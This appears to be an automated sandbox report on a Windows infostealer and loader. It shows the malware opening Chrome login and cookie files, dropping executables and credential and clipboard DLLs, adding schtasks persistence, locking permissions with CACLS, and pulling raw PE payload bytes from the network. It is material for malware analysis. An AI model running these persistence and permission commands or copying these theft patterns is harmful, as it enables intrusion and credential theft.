region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe93d7d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0
description nbveek.exe tried to sleep 128 seconds, actually delayed analysis time by 128 seconds
Time & API Arguments Status Return Repeated

GetDiskFreeSpaceW

 number_of_free_clusters: 2425739
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 2425739
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 2425482
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 2425482
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 2425275
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 2425275
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 2425126
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 2425126
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 2424477
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 2424477
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 2424291
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 2424291
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 2424142
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 2424142
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State
file C:\Users\test22\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe
file C:\Users\test22\AppData\Local\Temp\IXP002.TMP\kFw24bl.exe
file C:\Users\test22\AppData\Local\Temp\IXP002.TMP\leW63TH.exe
file C:\Users\test22\AppData\Local\Temp\IXP002.TMP\sCf07ZB.exe
file C:\Users\test22\AppData\Roaming\a091ec0a6e2227\cred64.dll
file C:\Users\test22\AppData\Local\Temp\1000003051\truno.exe
file C:\Users\test22\AppData\Local\Temp\IXP003.TMP\dNZ51dd.exe
file C:\Users\test22\AppData\Local\Temp\IXP001.TMP\nJM68XE.exe
file C:\Users\test22\AppData\Roaming\006700e5a2ab05\cred64.dll
file C:\Users\test22\AppData\Local\Temp\IXP000.TMP\sLP46se.exe
file C:\Users\test22\AppData\Local\Temp\IXP000.TMP\nXi14fa28.exe
file C:\Users\test22\AppData\Local\Temp\IXP000.TMP\rtJ58hE.exe
file C:\Users\test22\AppData\Local\Temp\IXP003.TMP\iWr34lU.exe
file C:\Users\test22\AppData\Roaming\a091ec0a6e2227\clip64.dll
file C:\Users\test22\AppData\Local\Temp\IXP002.TMP\nRK04uJ07.exe
file C:\Users\test22\AppData\Local\Temp\1000245001\Underglaze.exe
file C:\Users\test22\AppData\Local\Temp\IXP001.TMP\slV42BL.exe
file C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll
file C:\Users\test22\AppData\Roaming\1000239000\agent.exe
file C:\Users\test22\AppData\Local\Temp\IXP003.TMP\eTh66Ma.exe
file C:\Users\test22\AppData\Local\Temp\IXP000.TMP\nBU16dI.exe
file C:\Users\test22\AppData\Local\Temp\1000004001\lebro.exe
file C:\Users\test22\AppData\Local\Temp\IXP003.TMP\kQu23BE.exe
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\test22\AppData\Local\Temp\9e0894bcc4\nbveek.exe" /F
cmdline "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "test22:N"&&CACLS "nbveek.exe" /P "test22:R" /E&&echo Y|CACLS "..\9e0894bcc4" /P "test22:N"&&CACLS "..\9e0894bcc4" /P "test22:R" /E&&Exit
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\test22\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe" /F
cmdline C:\Windows\system32\cmd.exe /S /D /c" echo Y"
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\test22\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe" /F
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\test22\AppData\Local\Temp\9e0894bcc4\nbveek.exe" /F
cmdline "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "test22:N"&&CACLS "mnolyk.exe" /P "test22:R" /E&&echo Y|CACLS "..\4f9dd6f8a7" /P "test22:N"&&CACLS "..\4f9dd6f8a7" /P "test22:R" /E&&Exit
file C:\Users\test22\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe
file C:\Users\test22\AppData\Local\Temp\1000003051\truno.exe
file C:\Users\test22\AppData\Local\Temp\1000004001\lebro.exe
file C:\Users\test22\AppData\Roaming\1000239000\agent.exe
file C:\Users\test22\AppData\Local\Temp\1000245001\Underglaze.exe
file C:\Users\test22\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe
file C:\Users\test22\AppData\Local\Temp\1000003051\truno.exe
file C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll
file C:\Users\test22\AppData\Local\Temp\1000004001\lebro.exe
file C:\Users\test22\AppData\Roaming\a091ec0a6e2227\clip64.dll
file C:\Users\test22\AppData\Roaming\1000239000\agent.exe
file C:\Users\test22\AppData\Local\Temp\1000245001\Underglaze.exe
Time & API Arguments Status Return Repeated

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: SCHTASKS
parameters: /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\test22\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe" /F
filepath: SCHTASKS
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: cmd
parameters: /k echo Y|CACLS "mnolyk.exe" /P "test22:N"&&CACLS "mnolyk.exe" /P "test22:R" /E&&echo Y|CACLS "..\4f9dd6f8a7" /P "test22:N"&&CACLS "..\4f9dd6f8a7" /P "test22:R" /E&&Exit
filepath: cmd
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000003051\truno.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000003051\truno.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000004001\lebro.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000004001\lebro.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: rundll32.exe
parameters: C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
filepath: rundll32.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\9e0894bcc4\nbveek.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\9e0894bcc4\nbveek.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: SCHTASKS
parameters: /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\test22\AppData\Local\Temp\9e0894bcc4\nbveek.exe" /F
filepath: SCHTASKS
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: cmd
parameters: /k echo Y|CACLS "nbveek.exe" /P "test22:N"&&CACLS "nbveek.exe" /P "test22:R" /E&&echo Y|CACLS "..\9e0894bcc4" /P "test22:N"&&CACLS "..\9e0894bcc4" /P "test22:R" /E&&Exit
filepath: cmd
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\AppData\Roaming\1000239000\agent.exe
parameters:
filepath: C:\Users\test22\AppData\Roaming\1000239000\agent.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000245001\Underglaze.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000245001\Underglaze.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: rundll32.exe
parameters: C:\Users\test22\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
filepath: rundll32.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: rundll32.exe
parameters: C:\Users\test22\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
filepath: rundll32.exe
1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 3044
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 110592
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x00402000
process_handle: 0x0000002c
1 0 0
Time & API Arguments Status Return Repeated

InternetReadFile

 buffer: MZÿÿ¸@ິ Í!¸LÍ!This program cannot be run in DOS mode. $×â%‡“ƒKԓƒKԓƒKÔöåNՒƒKÔöåHՒƒKÔöåOՇƒKÔöåJՂƒKԓƒJÔ ƒKÔöåC՚ƒKÔöå´Ô’ƒKÔöåIՒƒKÔRich“ƒKÔPELâ`bà  d  `j€@ `  E @Á Œ¢´À€ P ˆT@ ˆ.textcd `.dataH€h@À.idataR j@@.rsrc À‚ |@@.relocˆP þ @B‚@P‚@¤€@p@ˆ¢@È@u j@°i@@o@àÀ012P4ð4B€IPJÐJ`KÀK LÀLÐLàO€cÀc`g°i j`jàlðn@oppr radvapi32.dllCheckTokenMembership" .INF[]RebootAdvancedINFVersionsetupx.dllsetupapi.dll.BATSeShutdownPrivilegeadvpack.dllDelNodeRunDLL32*...wininit.ini%luSoftware\Microsoft\Windows\CurrentVersion\App Paths\Kernel32.dllHeapSetInformationTITLEEXTRACTOPTINSTANCECHECKVERCHECKDecryptFileALICENSE<None>REBOOTSHOWWINDOWADMQCMDUSRQCMDRUNPROGRAMPOSTRUNPROGRAMFINISHMSGLoadString() Error. Could not load string resource.CABINETFILESIZESPACKINSTSPACEUPROMPTIXP%03d.TMPIXPi386mipsalphappcA:\msdownld.tmpTMP4351$.TMPRegServerUPDFILE%luControl Panel\Desktop\ResourceLocaleâ`b%ttâ`b Øœœâ`bprRSDSºÍã÷æÎÍú1‚ òïåwextract.pdbGCTL¬.rdata$brc¬.CRT$XCA°.CRT$XCAA´.CRT$XCZ¸.CRT$XIA¼.CRT$XIAAÀ.CRT$XIYÄ.CRT$XIZÈx.gfids@0.rdatap.rdata$sxdatat .rdata$zzzdbg€8\.text$mn¸r\.xdata$x€à.dataàh.bss ˆ.idata$5ˆ¢.00cfgŒ¢ .idata$2,£.idata$3@£ˆ.idata$4È¥Š .idata$6À.rsrc$01Ä ‰.rsrc$02‹ÿU‹ì3À…Òtúÿÿÿv¸W€…Àx QÿuQèÛë…ÒtÆ]‹ÿU‹ìSVW3ÿ»W€‹÷…Òtúÿÿÿv‹ó…öx?‹ò‹Á…Òt €8t@ƒîuõ‹þ‹Â÷Þö+ǁæ©ÿøó÷ßÿ#ø…öxQÿu+×QÏèn‹ð_‹Æ^[]‹ÿU‹ì‹E V3ö…Àt=ÿÿÿv¾W€…öx5S‹]3öWxÿEPÿuWSÿ|¢@ƒÄ…Àx;Çwu ë¾z€Æ_[ë …Àt‹MÆ‹Æ^]ËÿU‹ì…Òt&‹E SV¾þÿÿ+Á…ötŠ„Ût ˆANƒêuì^[…ÒuI÷ÚÆҁâ†ÿø‚z€] ‹ÿU‹ì9Mr‹Eº+Á;Âw+M ë3À]‹ÿU‹ìƒì¡€@3ʼnEüSVW3ÀfÇEø‹ñ‰EôhD@‰uè‹Øÿx @‹ø…ÿtjhT@Wÿœ @‰Eð…ÀtP3ɍEìPQQQQQQh j jEô‰PCÿ$ @…Àt*‹Mð‹ôÿuèÿuìjÿˆ¢@ÿUð;ôt¹Í)ÿuìÿ @Wÿ¬ @‹Mü‹Ã_^3Í[èAT‹å]ËÿU‹ìƒì¡€@3ʼnEü¡(@SWj3ÛfÇEø_‰]ô‰]ð;Ç…ôMðèÿÿÿ…À…ӍEèPjÿ¡@Pÿ @…À„ɍEìPSSWÿuèÿ @…À…’ÿl @ƒøz…ƒVÿuìSÿP¡@‹ð…ötqEìPÿuìVWÿuèÿ @…ÀtTEäPSSSSSSh j WEôPÿ$ @…Àt49v'~ÿuäÿ7ÿ, @…Àu CƒÇ;réë 3À@£(@‰Eðÿuäÿ @Vÿ¤ @^ÿuèÿˆ @‹Eðë‹Eð…Àt Ç(@‹Mü_3Í[è S‹å]ÃÌÌÌÌÌÌ̋ÿU‹ìì¡€@3ʼnEü‹E V‹u-t!ƒèu‹UŠÃ÷ÿÿƒùw RVÿà¡@ëP3ÀëOÿÌ¡@‹Ð‹Îè)h…üýÿÿƅüýÿÿPÿuÿ5<š@ÿè¡@…üýÿÿPh?VÿÔ¡@jÿÿÜ¡@3À@‹Mü3Í^èbR‹å]‹ÿU‹ìQS‹Á‹ÚVW‰Eü3ÿ‹0ë€>tFf¾‹ËèÔK…Àuë‹Eüf¾‰0ë3Àë#€<7tGf¾7‹Ëè®K…Àté7€8tÆ@_^[‹å]ËÿU‹ìì¡€@3ʼnEü‹EºSV‹Ù‰…èùÿÿ‹E ôýÿÿWS‰…ìùÿÿè[ûÿÿ€½ôýÿÿ"u ºl@…õýÿÿë ºp@…ôýÿÿðùÿÿ‰…ðùÿÿè-ÿÿÿ‹µðùÿÿ‹ø…öt<‹ÎQŠA„Àuù+ʃùr)ŠF<:u€~\t €>\u<\uVºøþÿÿèãúÿÿë(Qhä‘@QºøþÿÿèËûÿÿVºøþÿÿèÃIj.Z‹Îè÷J…À„šjÿht@jÿPjjÿh @Hƒè…|…øþÿÿPÿ
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: MZÿÿ¸@øº´ Í!¸LÍ!This program cannot be run in DOS mode. $U¦M Ç#óÇ#óÇ#óJ¯ òÇ#óJ¯&òÇ#óJ¯'òÇ#óĪ'òÇ#óĪ òÇ#óĪ&ò:Ç#óJ¯"òÇ#óÇ"ó²Ç#óŠ©*òÇ#óŠ©ÜóÇ#óŠ©!òÇ#óRichÇ#óPELè!Ícà Ì uvà@@@mdÐààl(À?pÔ@0@@à.text½ÊÌ `.rdataè˜àšÐ@@.data€D€j@À.rsrcàЂ@@.relocl(à*„@Bh€§BèÕcYÃÌÌÌÌh §BèÅcYÃÌÌÌÌj h|3C¹Œ‹CèOKhà§Bè¤cYÃÌÌÌj h 3C¹Œ‘Cè/Kh@¨Bè„cYÃÌÌÌjhÄ3C¹’CèKh ¨BèdcYÃÌÌÌj hÌ3C¹”ŒCèïJh©BèDcYÃÌÌÌjhð3C¹D‘CèÏJh`©Bè$cYÃÌÌÌjh4C¹´ŠCè¯JhÀ©BècYÃÌÌÌjh{3C¹Ô‘CèJh ªBèäbYÃÌÌÌjh{3C¹L’CèoJh€ªBèÄbYÃÌÌÌjh{3C¹¬ŒCèOJhàªBè¤bYÃÌÌÌjh{3C¹TŠCè/Jh@«Bè„bYÃÌÌÌjh$4C¹D‹CèJh «BèdbYÃÌÌÌjh04C¹t‘CèïIh¬BèDbYÃÌÌÌjhD4C¹<CèÏIh`¬Bè$bYÃÌÌÌj hX4C¹\”Cè¯IhÀ¬BèbYÃÌÌÌj(hh4C¹L•CèIh ­BèäaYÃÌÌÌjh”4C¹”CèoIh€­BèÄaYÃÌÌÌjh 4C¹ì”CèOIhà­Bè¤aYÃÌÌÌjDh°4C¹t”Cè/Ih@®Bè„aYÃÌÌÌj\hø4C¹dŒCèIh ®BèdaYÃÌÌÌj hX5C¹TCèïHh¯BèDaYÃÌÌÌjhh5C¹|‰CèÏHh`¯Bè$aYÃÌÌÌjhp5C¹|Cè¯HhÀ¯BèaYÃÌÌÌj<hŒ5C¹L‰CèHh °Bèä`YÃÌÌÌj hÌ5C¹4‰CèoHh€°BèÄ`YÃÌÌÌjhÜ5C¹ô’CèOHhà°Bè¤`YÃÌÌÌj hô5C¹•Cè/Hh@±Bè„`YÃÌÌÌjXh6C¹,ŽCèHh ±Bèd`YÃÌÌÌjhd6C¹•CèïGh²BèD`YÃÌÌÌjh|6C¹Ü’CèÏGh`²Bè$`YÃÌÌÌjhˆ6C¹D”Cè¯GhÀ²Bè`YÃÌÌÌjh”6C¹$ŠCèGh ³Bèä_YÃÌÌÌjhœ6C¹LCèoGh€³BèÄ_YÃÌÌÌjh¤6C¹<CèOGhà³Bè¤_YÃÌÌÌjh°6C¹´Cè/Gh@´Bè„_YÃÌÌÌjh¼6C¹¬‰CèGh ´Bèd_YÃÌÌÌjhÈ6C¹|’CèïFhµBèD_YÃÌÌÌjhÔ6C¹\ŽCèÏFh`µBè$_YÃÌÌÌjhà6C¹ôCè¯FhÀµBè_YÃÌÌÌjhì6C¹CèFh ¶Bèä^YÃÌÌÌjhø6C¹ü“CèoFh€¶BèÄ^YÃÌÌÌjh7C¹„CèOFhà¶Bè¤^YÃÌÌÌjh7C¹Ô”Cè/Fh@·Bè„^YÃÌÌÌjh7C¹ì‘CèFh ·Bèd^YÃÌÌÌjh(7C¹<ŠCèïEh¸BèD^YÃÌÌÌjhD7C¹œCèÏEh`¸Bè$^YÃÌÌÌjhL7C¹d•Cè¯EhÀ¸Bè^YÃÌÌÌjhT7C¹œ“CèEh ¹Bèä]YÃÌÌÌjh\7C¹,‹CèoEh€¹BèÄ]YÃÌÌÌj hh7C¹¬•CèOEhà¹Bè¤]YÃÌÌÌj hx7C¹„ŠCè/Eh@ºBè„]YÃÌÌÌjhˆ7C¹äCèEh ºBèd]YÃÌÌÌjh7C¹‹CèïDh»BèD]YÃÌÌÌjh˜7C¹4ŒCèÏDh`»Bè$]YÃÌÌÌjh 7C¹DŽCè¯DhÀ»Bè]YÃÌÌÌjh¨7C¹t‹CèDh ¼Bèä\YÃÌÌÌjh°7C¹‘CèoDh€¼BèÄ\YÃÌÌÌj h¸7C¹,‘CèODhà¼Bè¤\YÃÌÌÌjhÈ7C¹ÌCè/Dh@½Bè„\YÃÌÌÌjhÐ7C¹Ü‰CèDh ½Bèd\YÃÌÌÌjhØ7C¹´“CèïCh¾BèD\YÃÌÌÌjhà7C¹Ä’CèÏCh`¾Bè$\YÃÌÌÌjhì7C¹´Cè¯ChÀ¾Bè\YÃÌÌÌjhô7C¹¤”CèCh ¿Bèä[YÃÌÌÌjh8C¹„CèoCh€¿BèÄ[YÃÌÌÌjh8C¹”CèOChà¿Bè¤[YÃÌÌÌjh<8C¹ôŒCè/Ch@ÀBè„[YÃÌÌÌjhP8C¹¤‹CèCh ÀBèd[YÃÌÌÌjhh8C¹\‘CèïBhÁBèD[YÃÌÌÌjht8C¹ÔŽCèÏBh`ÁBè$[YÃÌÌÌjhŒ8C¹Ä•Cè¯BhÀÁBè[YÃÌÌÌjh˜8C¹Ì“CèBh ÂBèäZYÃÌÌÌjh°8C¹Ä‰CèoBh€ÂBèÄZYÃÌÌÌjhÄ8C¹|ŒCèOBhàÂBè¤ZYÃÌÌÌjhÌ8C¹tŽCè/Bh@ÃBè„ZYÃÌÌÌjhè8C¹ŒCèBh ÃBèdZYÃÌÌÌjhü8C¹üCèïAhÄBèDZYÃÌÌÌjh9C¹¬CèÏAh`ÄBè$ZYÃÌÌÌjh9C¹T“Cè¯AhÀÄBèZYÃÌÌÌjh 9C¹ŽCèAh ÅBèäYYÃÌÌÌjh49C¹Œ”CèoAh€ÅBèÄYYÃÌÌÌjhH9C¹”•CèOAhàÅBè¤YYÃÌÌÌjhP9C¹4’Cè/Ah@ÆBè„YYÃÌÌÌj@hX9C¹ÜŒCèAh ÆBèdYYÃÌÌÌjhœ9C¹dCèï@hÇBèDYYÃÌÌÌjLh¨9C¹¤ŽCèÏ@h`ÇBè$YYÃÌÌÌj<hø9C¹ÌŠCè¯@hÀÇBèYYÃÌÌÌj h8:C¹äCè@h ÈBèäXYÃÌÌÌjhH:C¹4Cèo@h€ÈBèÄXYÃÌÌÌjhT:C¹ŒŽCèO@hàÈBè¤XYÃÌÌÌjh`:C¹üCè/@h@ÉBè„XYÃÌÌÌj@hp:C¹”‰Cè@h ÉBèdXYÃÌÌÌjPh¸:C¹¼”Cèï?hÊBèDXYÃÌÌÌjh ;C¹ô‰CèÏ?h`ÊBè$XYÃÌÌÌj4h ;C¹<“Cè¯?hÀÊBèXYÃÌÌÌj hX;C¹lCè?h ËBèäWYÃÌÌÌ
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $,CyáCyáCyáâ~Iyáä~Ëyáå~Qyá–å~Lyá–â~Ryá–ä~byáà~FyáCyàyáØè~@yáØá~ByáØByáØã~ByáRichCyáPEL'žïcà! ތ>ð°@ Jœ<K<€øT ?p?@ð,.textVÝÞ `.rdataîaðbâ@@.dataD` D@À.rsrcø€P@@.relocTR@Bj h¨<¹phè?#hêèŒ*YÃÌÌÌj8hÌ<¹ˆhè#h`êèl*YÃÌÌÌj8hÌ<¹ hèÿ"hÀêèL*YÃÌÌÌj8hÌ<¹¸hèß"h ëè,*YÃÌÌÌj8h=¹Ðhè¿"h€ëè *YÃÌÌÌj0hD=¹èhèŸ"hàëèì)YÃÌÌÌj0hx=¹iè"h@ìèÌ)YÃÌÌÌh€h°=¹iè\"h ìè©)YÃj?h€>¹0iè?"híèŒ)YÃÌÌ̋ÁÂÌÌÌÌÌÌÌÌÌÌÌU‹ìV‹ñWÀFPÇ”ñf֋EƒÀPèÂ2ƒÄ‹Æ^]ÂÌÌ̋I¸|<…ÉEÁÃÌÌU‹ìV‹ñFÇ”ñPèó2ƒÄöEt j Vè«%ƒÄ‹Æ^]AÇ”ñPèÉ2YÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌWÀ‹ÁfÖAÇA<ÇìñÃÌÌÌÌÌÌÌÌU‹ìƒì MôèÒÿÿÿhˆJEôPè›2ÌÌÌÌU‹ìV‹ñWÀFPÇ”ñf֋EƒÀPèò1ƒÄÇìñ‹Æ^]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìV‹ñWÀFPÇ”ñf֋EƒÀPè²1ƒÄÇ ñ‹Æ^]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìQS‹ZVWQS‹ñè‹=€h3É3À‰}ü…Û~53Ò;NjþEЃ=„h¸phCphƒ~r‹>ŠˆA‹}üB;Ë|˃~r‹_Æ‹Æ^[‹å]Ã_Æ‹Æ^[‹å]ÃÌÌÌÌÌU‹ìƒìSVW‹ò‹ùQ‰}ô‹FP‰Eðè“3ۉ]ø9]ðŽ)Dƒ~‹Ær‹¾Pè¯KƒÄ…Àu-‹N‹Æƒùr‹€< t‹Æƒùr‹ƒ‹Ïr‹Šé̃~‹Ær‹‹=@i3ҋ Di…ÿt+ŠˆEÿfDŠ]ÿƒù¸0iC0i8‹]øtB;×ráƒÊÿ‹E‹Èƒxr‹3À…ÿt.Š ˆMÿDƒ=Di¹0iŠ]ÿC 0i8‹]øt@;Çr݃Èÿƒ=Di¹0iC 0i‰Mì‹Mô‰Møƒyr‹ ‰Mø‹Ï+ȍ 3Ò÷÷‹Mì‹}ôŠ ‹MøˆC‰]ø;]ðŒÜþÿÿƒr‹Æ‹Ç_^[‹å]ÃÆ‹Ç_^[‹å]ÃÌÌÌÌÌÌÌÌÌÌU‹ìƒì@SVW‹Ù‹òQMĉ]ôèçýÿÿEċÖPMÜèYþÿÿhÇCÇCÆè°"‹Ø¹ƒÈÿ‰]ø‹ûƒÄ ó«3Ò„¾Š8>‰‹Bƒú@|ð‹Uì3ö3ۍ~ø…ÒtA‹Møƒ}ðEÜCEܾ‹ƒøÿt'ÁæðƒÇx‹Ï‹ÆÓø‹MôPè‹Uìƒï‹MøC;Úr‹Eø…ÀthPèð!ƒÄ‹Uðƒúr(‹MÜB‹Áúr‹IüƒÂ#+ÁƒÀüƒøwVRQèÀ!ƒÄ‹UØÇEìÇEðÆE܃úr(‹MÄB‹Áúr‹IüƒÂ#+ÁƒÀüƒøwRQè~!ƒÄ‹Eô_^[‹å]Ãè›GÌÌÌÌÌÌÌÌÌÌÌU‹ìƒì4‹E0SVW3ÿÆEè¾…À„‹]ÇEàÇEäÆEÐ;Ç‚´+ǍMÐ;ÃB؃}4E CE SÇPèƒþr.‹MèV‹Áúr‹IüƒÂ#+ÁƒÀüƒø‡hRQè× ƒÄMЃ}Uó~EàEèCUƒ}ä‹uà‹]f~ÉMèCÁfÖEø;óu\ƒîr‹; uƒÀƒÂƒîsïƒþü„îŠ: u7ƒþý„ߊH:Ju&ƒþþ„ΊH:Juƒþÿ„½Š@:B„±‹E0G‹uü;ø‚õþÿÿ3ÿ‹Uƒþr/‹MèF‹Áþr‹IüƒÆ#+ÁƒÀüƒø‡’VQè ‹UƒÄ‹Eƒør'H‹Âùr‹RüƒÁ#+ƒÀüƒøw`QRèσċU4ÇEÇEÆEƒúr3‹M B‹Áúr‹IüƒÂ#+ÁƒÀüƒøwë ‹uüGéWÿÿÿRQ肃ċÇ_^[‹å]Ãè Eè«ÌÌÌÌÌÌÌÌÌÌÌU‹ìQS‹]V‹ñ‰]üWjhÀ>ÇFÇFÆèD3ÿ…Û~1ƒ}ECEŠ8S¿C €ú¶È¶ÃGȶÁ‹ÎPèG;}ü|ϋUƒúr(‹MB‹Áúr‹IüƒÂ#+ÁƒÀüƒøwRQèуÄ_‹Æ^[‹å]ÃèïDÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìƒì0VWj$hÄ>MÐÇEàÇEäÆEÐè—‹E…Àu3öéÇ3ÿ…À„¸ÇEøÇEüÆEè;Ç‚F+ǹ;ÁBȃ}ECEQǍMèPèBƒìEЋÌPètƒìEè‹ôƒì‹ÌPèa‹ÎèªþÿÿƒÄè¢üÿÿ‹UüƒÄ0…À„šƒúr,‹MèB‹Áúr‹IüƒÂ#+ÁƒÀüƒø‡¹RQèǃċEG;ø‚Hÿÿÿ¾‹Uäƒúr(‹MÐB‹Áúr‹IüƒÂ#+ÁƒÀüƒøwxRQ膃ċUƒúr^‹MB‹ÁúrF‹IüƒÂ#+ÁƒÀüƒøwHë4ƒúr(‹MèB‹Áúr‹IüƒÂ#+ÁƒÀüƒøw#RQè1ƒÄ3öétÿÿÿRQè ƒÄ_‹Æ^‹å]Ãè?CèJÌÌÌÌÌÌÌÌÌÌU‹ìQ‹E‹U‹MV…À„‚S@WPè] ƒÄMƒ}‹Ø‹ÓCM+ъIˆD ÿ„Àuó‹óNŠF„Àuù+ñFVjÿðV‹øSWÿðPèÇ5ƒÄ WÿðjÿñÿñWjÿñÿ ñ‹U‹M_[^ƒúr%B‹Áúr‹IüƒÂ#+ÁƒÀüƒøwRQèAƒÄ‹å]ÃèdBÌÌÌÌU‹ìƒì$SVW‹ùjÇGÇGÆÿñ…À„‡j ÿ$ñ‹Ø‰]ü…Û„lSÿð‰Eô…À„SjjjjjÿPjhéýÿ ð‹ð‰uø…öŽ.‹WN;Êw‰O‹Çƒr‹ÆëF‹G‹Ù+Ú+Â;Øw%ƒ‹Ç‰Or‹S4jVèE,ÆƒÄ ‹uøëQSÆEø‹ÏÿuøS訋]üƒ‹Çr‹jjVPjÿÿuô
request_handle: 0x00cc000c
1 1 0

InternetReadFile

